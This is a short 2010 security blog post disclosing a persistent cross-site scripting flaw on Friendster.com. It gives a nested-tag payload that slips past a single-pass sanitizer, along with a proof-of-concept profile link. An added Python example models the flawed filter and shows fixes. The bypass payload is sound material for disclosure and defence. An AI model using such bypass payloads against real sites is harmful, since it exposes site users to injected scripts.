This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 6, 2010

Friendster.com Persistent XSS

Only one sanitization pass is performed on user-submitted data, so markup that only takes shape after the filter removes an inner tag is never re-checked.

Exploit: <<z>script>alert(0)<<z>/script>

PoC: http://profiles.friendster.com/31202727
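
The single-pass flaw described above, as an added example that is not from the original post: the tag-stripping regex is an assumed model of the site's filter (the page does not show it) and the function names are hypothetical. It runs the post's payload through one pass, through repeated passes, and through output encoding.

```python
import html
import re

# Assumed model of the filter: delete anything that looks like a complete tag.
TAG = re.compile(r"<[^<>]*>")

# Payload quoted in the post.
PAYLOAD = "<<z>script>alert(0)<<z>/script>"


def strip_once(value: str) -> str:
    """Vulnerable: a single pass. Deleting the inner <z> joins the leftover
    '<' and 'script>' into a new tag that the filter never looks at again."""
    return TAG.sub("", value)


def strip_until_stable(value: str) -> str:
    """Repeat the pass until the output stops changing (a fixed point).
    Terminates because every pass that changes the string shortens it."""
    while True:
        stripped = TAG.sub("", value)
        if stripped == value:
            return stripped
        value = stripped


def render(value: str) -> str:
    """Preferred: store the data as submitted and encode it for the HTML
    context at output time, so markup characters are rendered as text."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    print("single pass :", strip_once(PAYLOAD))
    print("fixed point :", strip_until_stable(PAYLOAD))
    print("encoded     :", render(PAYLOAD))
```

Looping to a fixed point closes this particular bypass, but context-aware output encoding is the more robust control because it does not depend on the filter recognising every tag form.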
